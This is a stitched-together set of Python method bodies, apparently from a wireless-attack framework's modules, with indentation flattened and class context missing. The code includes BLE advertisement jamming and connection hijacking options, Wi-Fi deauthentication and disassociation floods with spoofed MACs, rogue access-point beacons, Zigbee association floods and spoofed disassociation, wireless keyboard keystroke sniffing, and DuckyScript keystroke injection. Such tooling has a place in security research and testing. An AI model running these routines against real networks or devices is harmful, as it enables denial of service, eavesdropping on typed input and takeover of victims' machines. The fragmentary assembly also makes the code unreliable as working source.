def onStart(self):
# Power Level between -100 and 20 dbm
if "TXPOWER" in self.module.args and utils.integerArg(
self.module.args['TXPOWER']) != None:
self.txPwLvl = struct.pack(
'<b', utils.integerArg(self.module.args['TXPOWER']))
else:
self.txPwLvl = struct.pack('<b', MOCK_VALUES['gatt']['txPower'])
# Local short name
if 'NAME' in self.module.args and self.module.args['NAME'] != '':
self.shortName = self.module.args['NAME'][0:10]
else:
self.shortName = MOCK_VALUES['gap']['localName']
if 'PAIRING' in self.module.args:
self.pairing = utils.booleanArg(self.module.args['PAIRING'])
else:
self.pairing = MOCK_VALUES['control']['enable_pairing']
if self.pairing:
self.module.pairing(active='passive')
self.addPrimaryService()
self.startAdv()
return True
def run(self):
interface = self.args["INTERFACE"]
self.emitter = self.getEmitter(interface=interface)
if self.checkCapabilities():
if self.emitter.isConnected():
self.emitter.sendp(ble.BLEDisconnect())
while self.emitter.isConnected():
utils.wait(seconds=0.01)
address = (self.emitter.getAddress()
if self.args["ADVERTISING_ADDRESS"] == "" else
utils.addressArg(self.args["ADVERTISING_ADDRESS"]))
if address != self.emitter.getAddress():
self.emitter.setAddress(address)
if utils.isHexadecimal(self.args["SCANNING_DATA"]):
scanningData = bytes.fromhex(self.args["SCANNING_DATA"])
else:
scanningData = b""
if utils.isHexadecimal(self.args["ADVERTISING_DATA"]):
advertisingData = bytes.fromhex(self.args["ADVERTISING_DATA"])
else:
advertisingData = b""
destAddress = ("00:00:00:00:00:00"
if self.args["DESTINATION_ADDRESS"] == "" else
utils.addressArg(self.args["DESTINATION_ADDRESS"]))
intervalMin = utils.integerArg(self.args["INTERVAL_MIN"])
intervalMax = utils.integerArg(self.args["INTERVAL_MAX"])
advertisingType = self.args["ADVERTISING_TYPE"].upper()
advertisingAddressType = "public" if self.args[
"ADVERTISING_ADDRESS_TYPE"].lower() == "public" else "random"
destinationAddressType = "public" if self.args[
"DESTINATION_ADDRESS_TYPE"].lower() == "public" else "random"
self.emitter.setScanningParameters(data=scanningData)
self.emitter.setAdvertisingParameters(
type=advertisingType,
destAddr=destAddress,
data=advertisingData,
intervalMin=intervalMin,
intervalMax=intervalMax,
daType=advertisingAddressType,
oaType=destinationAddressType)
self.emitter.setAdvertising(
enable=utils.booleanArg(self.args["ENABLE"]))
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else -1
while time != 0:
utils.wait(seconds=1)
time -= 1
return self.ok({"INTERFACE": self.args["INTERFACE"]})
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to send advertisements.")
return self.nok()
def run(self):
self.emitter = self.getEmitter(interface=self.args['INTERFACE'])
self.receiver = self.getReceiver(interface=self.args['INTERFACE'])
self.windowSize = utils.integerArg(self.args['WINDOW'])
self.n = utils.integerArg(self.args['ENVIRONMENT_FACTOR'])
self.devices = {}
self.connections = {}
# store rssi values over time
self.values = {}
self.deviceCallback = self.args['DEVICE_CALLBACK'] if callable(
self.args['DEVICE_CALLBACK']) else self.display
self.connectionCallback = self.args['CONNECTION_CALLBACK'] if callable(
self.args['CONNECTION_CALLBACK']) else self.display
self._dirty = False
self.scanningTime = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else -1
scanDev = self.args['SCAN_TYPE'] == 'all' or self.args[
'SCAN_TYPE'] == 'devices'
if scanDev:
io.info('Scanning for existing devices')
self.receiver.setSweepingMode(enable=True, sequence=[37, 38, 39])
self.receiver.sniffAdvertisements(address="FF:FF:FF:FF:FF:FF")
self.receiver.onEvent("*", callback=self.onAdvertisement)
remainingTime = self.scanningTime
while remainingTime != 0:
utils.wait(seconds=1)
remainingTime -= 1
if (self._dirty):
self.deviceCallback(self.devices)
self._dirty = False
# stop listening for advertisements
self.receiver.setSweepingMode(enable=False)
self.receiver.removeCallbacks()
scanConn = self.args['SCAN_TYPE'] == 'all' or self.args[
'SCAN_TYPE'] == 'connections'
if scanConn:
io.info('Scanning for existing connections')
self.receiver.scanExistingConnections(
onConnection=self.onConnectionFound,
resetState=self.args['SCAN_TYPE'] == 'all')
remainingTime = self.scanningTime
while remainingTime != 0:
utils.wait(seconds=1)
remainingTime -= 1
if (self._dirty):
self.connectionCallback(self.connections)
self._dirty = False
return self.ok({
'devices': self.devices,
'connections': self.connections
})
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
if self.checkCapabilities():
if utils.isNumber(self.args["CHANNEL"]):
self.receiver.setChannel(utils.integerArg(
self.args["CHANNEL"]))
else:
io.fail("You must provide a channel number !")
return self.nok()
if self.args["TARGET_PANID"] != "":
self.targetPanID = utils.integerArg(self.args["TARGET_PANID"])
else:
self.targetPanID = None
if self.args["TARGET"] != "" and self.args["TARGET"][2:].upper(
) != "FFFF" and self.args["TARGET"].upper(
) != "FF:FF:FF:FF:FF:FF:FF:FF":
if utils.isNumber(self.args["TARGET"]):
self.target = utils.integerArg(self.args["TARGET"])
else:
self.target = zigbee.convertAddress(self.args["TARGET"])
else:
self.target = None
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(interface=self.args["PCAP_FILE"])
else:
self.pcap = None
self.receiver.onEvent("*", callback=self.show)
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
utils.wait(seconds=0.1)
self.receiver.removeCallbacks()
output = {
"CHANNEL": self.args["CHANNEL"],
"INTERFACE": self.args["INTERFACE"],
"PCAP_FILE": self.args["PCAP_FILE"]
}
return self.ok(output)
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to sniff and inject frames.")
return self.nok()
def jamAdvertisements(self):
if self.checkAdvertisementsJammingCapabilities():
channel = utils.integerArg(self.args["CHANNEL"])
if self.args["TARGET"] != "":
target = utils.addressArg(self.args["TARGET"])
pattern = bytes.fromhex(target.replace(":", ""))[::-1]
offset = 2
elif (utils.isNumber(self.args["OFFSET"])
and utils.isHexadecimal(self.args["PATTERN"])
and self.args["OFFSET"] != ""
and self.args["PATTERN"] != ""):
pattern = bytes.fromhex(self.args["PATTERN"])
offset = utils.integerArg(self.args["OFFSET"])
else:
io.fail(
"You must provide a dewhitened pattern and an offset, or a target to jam."
)
return self.nok()
if len(self.emitters) == 1:
self.emitters[0].jamAdvertisements(pattern=pattern,
offset=offset,
channel=channel)
if len(self.emitters) == 2:
self.emitters[0].jamAdvertisements(pattern=pattern,
offset=offset,
channel=channel)
self.emitters[1].jamAdvertisements(
pattern=pattern,
offset=offset,
channel=(channel + 1 if channel < 39 else 37))
if len(self.emitters) == 3:
self.emitters[0].jamAdvertisements(pattern=pattern,
offset=offset,
channel=37)
self.emitters[1].jamAdvertisements(pattern=pattern,
offset=offset,
channel=38)
self.emitters[2].jamAdvertisements(pattern=pattern,
offset=offset,
channel=39)
while True:
utils.wait(seconds=0.01)
else:
io.fail("Interfaces provided are not able to jam advertisements.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
if self.checkSniffingCapabilities():
self.target = "FF:FF:FF:FF" if self.args[
"TARGET"] == "" else self.args["TARGET"].upper()
if self.target == "FF:FF:FF:FF":
self.receiver.enterPromiscuousMode()
else:
self.receiver.enterSnifferMode(self.target)
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(interface=self.args["PCAP_FILE"])
if utils.booleanArg(self.args["DONGLE_PACKETS"]):
self.receiver.enableDonglePackets()
else:
self.receiver.disableDonglePackets()
if self.args["CHANNEL"] == "" or self.args["CHANNEL"].lower(
) == "auto":
while not self.find():
io.info("Retrying ...")
else:
self.receiver.setChannel(utils.integerArg(
self.args["CHANNEL"]))
self.receiver.onEvent("*", callback=self.show)
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
utils.wait(seconds=0.5)
self.receiver.removeCallbacks()
if self.pcap is not None:
self.pcap.stop()
output = {}
output["MOUSE_FILE"] = self.args["MOUSE_FILE"]
output["PCAP_FILE"] = self.args["PCAP_FILE"]
output["TARGET"] = self.target
output["CHANNEL"] = str(int(self.receiver.getChannel()))
return self.ok(output)
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to run in sniffing mode.")
return self.nok()
def keyDistribution(self, type="initiator"):
if type == "initiator":
keyDistribution = self.initiatorKeyDistribution
else:
keyDistribution = self.responderKeyDistribution
if keyDistribution.encKey:
io.info("Sending LTK...")
self.emitter.sendp(
ble.BLEEncryptionInformation(
ltk=bytes.fromhex(self.args["LTK"])[::-1]))
self.emitter.sendp(
ble.BLEMasterIdentification(
ediv=utils.integerArg(self.args["EDIV"]),
rand=bytes.fromhex(self.args["RAND"])))
io.success("Sent !")
if keyDistribution.idKey:
io.info("Sending IRK...")
self.emitter.sendp(
ble.BLEIdentityInformation(
irk=bytes.fromhex(self.args["IRK"])[::-1]))
self.emitter.sendp(
ble.BLEIdentityAddressInformation(
address=utils.addressArg(self.args["ADDR"]),
type=self.args["ADDR_TYPE"].lower()))
io.success("Sent !")
if keyDistribution.signKey:
io.info("Sending CSRK...")
self.emitter.sendp(
ble.BLESigningInformation(
csrk=bytes.fromhex(self.args["CSRK"])[::-1]))
io.success("Sent !")
def run(self):
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
if utils.isNumber(self.args["CHANNEL"]):
self.emitter.setChannel(utils.integerArg(self.args["CHANNEL"]))
else:
io.fail("You must provide a channel number !")
return self.nok()
self.pcapReceiver = self.getReceiver(
interface=self.args["PCAP_FILE"])
io.info("Extracting packet stream from PCAP ...")
stream = self.pcapReceiver.generateStream()
io.success("Packet stream successfully extracted !")
io.info("Injecting ...")
self.emitter.sendp(*stream)
for i in stream:
i.show()
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
io.success("Injection done !")
return self.ok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to inject frames.")
return self.nok()
def run(self):
interface = self.args["INTERFACE"]
timeout = utils.integerArg(self.args["TIMEOUT"])
self.emitter = self.getEmitter(interface=interface)
self.receiver = self.getReceiver(interface=interface)
if self.checkCapabilities():
io.info("Trying to connect to : " + self.args["TARGET"] +
" (type : " + self.args["CONNECTION_TYPE"] + ")")
self.emitter.sendp(
ble.BLEConnect(self.args["TARGET"],
type=self.args["CONNECTION_TYPE"]))
while not self.receiver.isConnected() and timeout > 0:
timeout -= 1
utils.wait(seconds=1)
if self.receiver.isConnected():
io.success("Connected on device : " + self.args["TARGET"])
return self.ok({"INTERFACE": self.args["INTERFACE"]})
else:
io.fail("Error during connection establishment !")
self.emitter.sendp(ble.BLEConnectionCancel())
return self.nok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to initiate connection.")
return self.nok()
def send_deauth(self):
packet_count = utils.integerArg(self.args["COUNT"])
if packet_count == 0:
count = 0
while True:
if self.args["MODE"].lower(
) == "both" or self.args["MODE"].lower() == "deauthentication":
self.emitter.sendp(self.deauth_packet)
if self.args["MODE"].lower(
) == "both" or self.args["MODE"].lower() == "disassociation":
self.emitter.sendp(self.disas_packet)
utils.wait(seconds=0.05)
count += 1
if count % 100 == 0 and utils.booleanArg(self.args['VERBOSE']):
io.info("Sent {} deauthentication packets via {}".format(
count, self.args["INTERFACE"]))
else:
for count in range(packet_count):
if self.args["MODE"].lower(
) == "both" or self.args["MODE"].lower() == "deauthentication":
self.emitter.sendp(self.deauth_packet)
if self.args["MODE"].lower(
) == "both" or self.args["MODE"].lower() == "disassociation":
self.emitter.sendp(self.disas_packet)
utils.wait(seconds=0.05)
if count % 100 == 0 and utils.booleanArg(self.args['VERBOSE']):
io.info("Sent {} deauthentication packets via {}".format(
count, self.args["INTERFACE"]))
def run(self):
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
if not utils.isNumber(self.args["CHANNEL"]):
io.fail("You must provide a channel number.")
return self.nok()
if self.args["TARGET"] == "":
io.warning(
"No target provided, the attack is performed in broadcast."
)
self.target = "FF:FF:FF:FF:FF:FF"
else:
io.info("Target provided: " + str(self.args["TARGET"]))
self.target = self.args["TARGET"].upper()
if self.args["SOURCE"] == "":
io.fail("You must provide a source address.")
return self.nok()
else:
self.source = self.args["SOURCE"].upper()
if utils.isNumber(self.args["REASON"]):
self.reason = utils.integerArg(self.args["REASON"])
else:
io.fail("You must provide a reason number.")
return self.nok()
self.emitter.setChannel(utils.integerArg(self.args["CHANNEL"]))
# We forge the deauthentication and disassociation packet, while spoofing the client's MAC
self.deauth_packet = wifi.WifiDeauth(destMac=self.target,
srcMac=self.source,
reason=self.reason)
self.disas_packet = wifi.WifiDisas(destMac=self.target,
srcMac=self.source,
reason=self.reason)
self.send_deauth()
return self.ok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to run in monitor mode.")
return self.nok()
def displayDevices(self):
if utils.integerArg(self.args["START_CHANNEL"]) != utils.integerArg(
self.args["END_CHANNEL"]):
sys.stdout.write(" " * 100 + "\r")
columnsNames = ["Pan ID", "Channel", "Association permitted", "Nodes"]
networks = []
nodes = ""
for panID, network in self.devices.items():
for node, role in network["nodes"].items():
nodes += zigbee.addressToString(node) + "(" + role + ")" + "\n"
networks.append([
hex(panID),
str(network["channel"]),
"yes" if network["associationPermitted"] else
("unknown" if network["associationPermitted"] is None else
"no"), nodes[:-1]
])
io.chart(columnsNames, networks)
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
if self.checkCapabilities():
frequency = self.receiver.getFrequency()
if frequency != utils.integerArg(self.args["FREQUENCY"]):
self.receiver.setFrequency(utils.integerArg(self.args["FREQUENCY"]))
self.count = utils.integerArg(self.args["NUMBER"]) if utils.isNumber(self.args["NUMBER"]) else 1
self.receiver.onEvent("*",callback=self.show)
self.receiver.waitData()
while self.count > 0:
utils.wait(seconds=0.5)
output = self.generateOutput()
return self.ok(output)
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to sniff IR signals.")
return self.nok()
def run(self):
if self.args["PCAP_FILE"] != "":
self.pcap = self.getEmitter(self.args["PCAP_FILE"])
else:
self.pcap = None
self.initEmittersAndReceivers()
if self.args["LTK"] != "":
ble.BLELinkLayerCrypto.provideLTK(bytes.fromhex(self.args["LTK"]))
if utils.booleanArg(self.args["HIJACKING"]) and not self.checkHijackingCapabilities():
io.fail("Interfaces provided are not able to hijack a connection.")
return self.nok()
if utils.booleanArg(self.args["JAMMING"]) and not self.checkJammingCapabilities():
io.fail("Interfaces provided are not able to jam a connection.")
return self.nok()
if self.args["SNIFFING_MODE"].upper() == "newConnections".upper():
if self.checkNewConnectionCapabilities():
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
return self.sniffNewConnections(target, utils.integerArg(self.args["CHANNEL"]))
else:
io.fail("Interfaces provided are not able to sniff new connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "existingConnections".upper():
if self.checkExistingConnectionCapabilities():
accessAddress = utils.integerArg(self.args["ACCESS_ADDRESS"]) if self.args["ACCESS_ADDRESS"]!="" else None
crcInit = utils.integerArg(self.args["CRC_INIT"]) if self.args["CRC_INIT"]!="" else None
channelMap = utils.integerArg(self.args["CHANNEL_MAP"]) if self.args["CHANNEL_MAP"]!="" else None
return self.sniffExistingConnections(self.receivers[0], accessAddress, crcInit, channelMap)
else:
io.fail("Interfaces provided are not able to sniff existing connections.")
return self.nok()
elif self.args["SNIFFING_MODE"].upper() == "advertisements".upper():
if self.checkAdvertisementsCapabilities():
target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
return self.sniffAdvertisements(target, utils.integerArg(self.args["CHANNEL"]))
else:
io.fail("Interfaces provided are not able to sniff advertisements.")
return self.nok()
return self.ok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.onEvent("*", callback=self.updateDevices)
start = utils.now()
startChannel = utils.integerArg(self.args["START_CHANNEL"])
endChannel = utils.integerArg(self.args["END_CHANNEL"])
numberOfChannels = endChannel + 1 - startChannel
channels = list(range(startChannel, endChannel + 1))
i = 0
while self.args["TIME"] == "" or utils.now(
) - start < utils.integerArg(self.args["TIME"]):
if startChannel != endChannel:
io.progress(i,
total=numberOfChannels,
suffix="Channel: " +
(" " if len(str(channels[i])) == 1 else "") +
str(channels[i]))
self.receiver.setChannel(channels[i])
if utils.booleanArg(self.args["ACTIVE"]):
self.emitter.sendp(
zigbee.ZigbeeBeaconRequest(sequenceNumber=1,
destPanID=0xFFFF,
destAddr=0xFFFF))
utils.wait(seconds=0.1)
i = (i + 1) % len(channels)
if startChannel != endChannel:
sys.stdout.write(" " * 100 + "\r")
if len(self.devices) == 0:
return self.nok()
else:
return self.generateOutput()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to sniff and inject frames.")
return self.nok()
def run(self):
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
if self.checkInjectingCapabilities():
self.pcapReceiver = self.getReceiver(interface=self.args["PCAP_FILE"])
self.target = "FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"])
if self.target == "FF:FF:FF:FF:FF" and not self.checkPassiveScanningCapabilities():
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to scan in promiscuous mode, you have to provide a specific target.")
return self.nok()
if self.target != "FF:FF:FF:FF:FF" and self.args["CHANNEL"].lower() == "auto" and not self.checkActiveScanningCapabilities():
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to perform an active scan.")
return self.nok()
if self.target == "FF:FF:FF:FF:FF":
io.info("Promiscuous mode enabled ! Every frame contained in the file indicated in PCAP_FILE will be transmitted.")
self.emitter.enterPromiscuousMode()
else:
io.info("Sniffing mode enabled !")
self.emitter.enterSnifferMode(address=self.target)
if utils.isNumber(self.args["CHANNEL"]):
self.emitter.setChannel(utils.integerArg(self.args["CHANNEL"]))
elif self.args["CHANNEL"].lower() == "auto":
self.searchChannel()
else:
io.fail("A channel must be provided in order to perform an injection.")
return self.nok()
io.info("Extracting packet stream from PCAP ...")
stream = self.pcapReceiver.generateStream()
io.success("Packet stream successfully extracted !")
io.info("Injecting ...")
self.emitter.sendp(*stream)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
io.success("Injection done !")
return self.ok()
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to inject.")
return self.nok()
def generateChannels(self):
if self.args["CHANNELS"] == "all" or self.args["CHANNELS"] == "":
self.channels = range(100)
io.info("Channels: 0-99")
else:
for i in utils.listArg(self.args["CHANNELS"]):
if utils.isNumber(i):
self.channels.append(utils.integerArg(i))
elif "-" in i and len(i.split("-")) == 2 and all(
[utils.isNumber(j) for j in i.split("-")]):
upChannel, downChannel = [int(j) for j in i.split("-")]
self.channels += range(upChannel, downChannel)
io.info("Channels: " + ','.join([str(j) for j in self.channels]))
def run(self):
self.receiver = self.getReceiver(self.args["INTERFACE"])
self.receiver.enterPromiscuousMode()
if self.checkPromiscuousSniffingCapabilities():
self.receiver.onEvent("*", callback=self.add)
if utils.booleanArg(self.args["DONGLE_PACKETS"]):
self.receiver.enableDonglePackets()
else:
self.receiver.disableDonglePackets()
start = utils.now()
startChannel = utils.integerArg(self.args["START_CHANNEL"])
endChannel = utils.integerArg(self.args["END_CHANNEL"])
numberOfChannels = endChannel + 1 - startChannel
channels = list(range(startChannel, endChannel + 1))
i = 0
while self.args["TIME"] == "" or utils.now(
) - start < utils.integerArg(self.args["TIME"]):
io.progress(i,
total=numberOfChannels,
suffix="Channel: " +
(" " if len(str(channels[i])) == 1 else "") +
str(channels[i]))
self.receiver.setChannel(channels[i])
utils.wait(seconds=0.1)
self.displayDevices()
i = (i + 1) % len(channels)
sys.stdout.write(" " * 100 + "\r")
if len(self.devices) >= 1:
return self.ok(self.generateOutput())
else:
return self.nok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to run in promiscuous mode.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.enterSnifferMode(
utils.addressArg(self.args["TARGET"]))
if self.checkInjectionSyncCapabilities():
if utils.booleanArg(self.args["SYNC"]):
self.receiver.enableSync()
else:
self.receiver.disableSync()
else:
io.warning(
"Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..."
)
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
if self.args["TEXT"] != "":
keystrokes = self.addMosartText(self.args["TEXT"])
self.emitter.sendp(*keystrokes)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
elif self.args["DUCKYSCRIPT"] != "":
parser = DuckyScriptParser(filename=self.args["DUCKYSCRIPT"])
keystrokes = parser.generatePackets(
textFunction=self.addMosartText,
initFunction=self.startMosartInjection,
keyFunction=self.addMosartKeystroke,
sleepFunction=self.addMosartDelay)
self.emitter.sendp(*keystrokes)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
elif utils.booleanArg(self.args["INTERACTIVE"]):
self.stop = False
self.watchKeyboard()
while not self.stop:
utils.wait(seconds=0.5)
return self.ok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to inject frames and run in sniffing mode.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
if self.args["TARGET_PANID"] == "":
io.fail("You must specify a target Pan ID.")
return self.nok()
self.panid = utils.integerArg(self.args["TARGET_PANID"])
io.info("PanID selected: 0x"+"{:04x}".format(self.panid).upper())
if self.args["TARGET"] != "":
self.target = utils.integerArg(self.args["TARGET"])
else:
io.warning("No target specified, Beacon Requests will be transmitted in order to discover the coordinator...")
self.target = None
while self.target is None:
self.emitter.sendp(zigbee.ZigbeeBeaconRequest(sequenceNumber=1,destPanID=self.panid,destAddr=0xFFFF))
pkt = self.receiver.next(timeout=1)
if isinstance(pkt,zigbee.ZigbeeBeacon) and pkt.coordinator and pkt.srcPanID == self.panid:
self.target = pkt.srcAddr
io.info("Coordinator selected: "+zigbee.addressToString(self.target))
while True:
address = random.randint(0,0xFFFF)
io.info("New address: "+zigbee.addressToString(address))
self.emitter.sendp(zigbee.ZigbeeAssociationRequest(destPanID=self.panid, destAddr=self.target,srcAddr=address,sequenceNumber=1,deviceType=True,srcPanID=0xFFFF))
self.emitter.sendp(zigbee.ZigbeeDataRequest(destPanID=self.panid, destAddr=self.target,srcAddr=address,sequenceNumber=2))
utils.wait(seconds=2)
return self.ok()
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to communicate as a Zigbee device.")
return self.nok()
def onStart(self):
if 'REQUESTS' in self.module.args and utils.integerArg(
self.module.args['REQUESTS'], 0) > 0:
self.requests = utils.integerArg(self.module.args['REQUESTS'])
else:
self.requests = MOCK_VALUES['control']['number_requests']
if 'INTERVAL' in self.module.args and utils.integerArg(
self.module.args['INTERVAL'], 0) > 0:
self.interval = utils.integerArg(self.module.args['INTERVAL'])
else:
self.interval = MOCK_VALUES['control']['request_time_interval']
if 'PAIRING' in self.module.args:
self.pairing = utils.booleanArg(self.module.args['PAIRING'])
else:
self.pairing = MOCK_VALUES['control']['enable_pairing']
if 'TARGET' in self.module.args and self.module.args['TARGET'] != '':
self.target = self.module.args['TARGET']
io.info('Provided target at ' + self.target)
self.customConnect()
else:
self.target = ""
if 'NAME' in self.module.args and self.module.args['NAME'] != '':
self.searchFor = self.module.args['NAME']
else:
self.searchFor = MOCK_VALUES['gap']['localName']
self.module.receiver.onEvent("BLEAdvertisement",
callback=self.onAdvertisement)
self.module.receiver.setScan(enable=True)
io.info('Scanning for slave named "' + self.searchFor + '"')
return True
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.receiver.enterSnifferMode(utils.addressArg(self.args["TARGET"]))
if self.checkSniffingCapabilities():
self.receiver.onEvent("MosartKeyboardKeystrokePacket",callback=self.show)
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
try:
time = utils.integerArg(self.args['TIME']) if self.args["TIME"] != "" else None
start = utils.now()
while utils.now() - start <= time if time is not None else True:
utils.wait(seconds=0.5)
except KeyboardInterrupt:
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
self.exportTextFile()
self.receiver.removeCallbacks()
return self.ok({"TEXT":self.text})
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to run in sniffing mode.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
if self.args["TARGET_PANID"] == "":
io.fail("You must specify a target Pan ID.")
return self.nok()
self.panid = utils.integerArg(self.args["TARGET_PANID"])
io.info("PanID selected: 0x"+"{:04x}".format(self.panid).upper())
if self.args["TARGET"] != "":
self.target = utils.integerArg(self.args["TARGET"])
else:
io.fail("You must specify a target.")
return self.nok()
io.info("Target selected: "+zigbee.addressToString(self.target))
if self.args["SOURCE"] != "":
self.source = utils.integerArg(self.args["SOURCE"])
else:
io.fail("You must specify a source address.")
return self.nok()
io.info("Source selected: "+zigbee.addressToString(self.source))
self.reason = utils.integerArg(self.args["REASON"])
while True:
self.emitter.sendp(zigbee.ZigbeeDisassociationNotification(destPanID=self.panid, srcAddr=self.source,destAddr=self.target,sequenceNumber=1,reason=self.reason))
return self.ok()
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to communicate as a Zigbee device.")
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.onEvent("BLEAdvertisement",callback=self.scan)
time = utils.integerArg(self.args['TIME']) if self.args["TIME"] != "" else -1
self.receiver.setScan(enable=True)
while time != 0:
utils.wait(seconds=1)
time -= 1
self.updateDevices()
self.receiver.setScan(enable=False)
return self.generateOutput()
else:
io.fail("Interface provided ("+self.args["INTERFACE"]+") is not able to scan.")
return self.nok()
def run(self):
self.emitter = bt.BluetoothEmitter(interface=self.args['INTERFACE'])
self.receiver = bt.BluetoothReceiver(interface=self.args['INTERFACE'])
time = utils.integerArg(self.args['TIME'])
self.emitter.sendp(bt.BluetoothInquiry(inquiryLength=time))
scanning = True
while scanning:
packet = self.receiver.next()
if isinstance(packet, bt.BluetoothInquiryComplete):
scanning = False
elif isinstance(packet, bt.BluetoothInquiryScanResult):
self.updateDevices(packet)
return self.ok()
def masterLongTermKeyRequest(self, pkt):
pkt.show()
if pkt.ediv == 0 and pkt.rand == b"\x00" * 8 and self.stk != b"\x00" * 8:
self.emitter.sendp(
ble.BLELongTermKeyRequestReply(positive=True,
ltk=self.stk[::-1]))
self.keyDistribution(type="responder")
elif pkt.ediv == utils.integerArg(
self.args["EDIV"]) and pkt.rand == bytes.fromhex(
self.args["RAND"]):
self.emitter.sendp(
ble.BLELongTermKeyRequestReply(positive=True,
ltk=bytes.fromhex(
self.args["LTK"])[::-1]))
else:
self.emitter.sendp(ble.BLELongTermKeyRequestReply(positive=False))
def monitoring(self):
self.receiver.onEvent("*", callback=self.onPacket)
try:
if self.args["TIME"] == "":
while True:
utils.wait(seconds=0.00001)
elif utils.isNumber(self.args["TIME"]):
time = utils.integerArg(self.args["TIME"])
start = utils.now()
while utils.now() - start < time:
utils.wait(seconds=0.0000001)
else:
io.fail("You have provided a wrong TIME value.")
return self.nok()
except KeyboardInterrupt:
pass
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.onEvent("WifiProbeRequest",
callback=self.probeResponse)
self.emitter.setChannel(utils.integerArg(self.args["CHANNEL"]))
while True:
self.emitter.sendp(
wifi.WifiBeacon(SSID=self.args["SSID"],
cypher=self.args["CYPHER"]))
utils.wait(seconds=0.1)
return self.ok()
else:
io.fail(
"Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to communicate as an access point and run in monitor mode."
)
return self.nok()
def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.enterSnifferMode(
utils.addressArg(self.args["TARGET"]))
if self.checkInjectionSyncCapabilities():
if utils.booleanArg(self.args["SYNC"]):
self.receiver.enableSync()
else:
self.receiver.disableSync()
else:
io.warning(
"Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..."
)
self.pcapReceiver = self.getReceiver(
interface=self.args["PCAP_FILE"])
self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"]))
io.info("Extracting packet stream from PCAP ...")
stream = self.pcapReceiver.generateStream()
io.success("Packet stream successfully extracted !")
io.info("Injecting ...")
self.emitter.sendp(*stream)
while not self.emitter.isTransmitting():
utils.wait(seconds=0.1)
while self.emitter.isTransmitting():
utils.wait(seconds=0.1)
io.success("Injection done !")
return self.ok()
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to inject frames and run in sniffing mode.")
return self.nok()
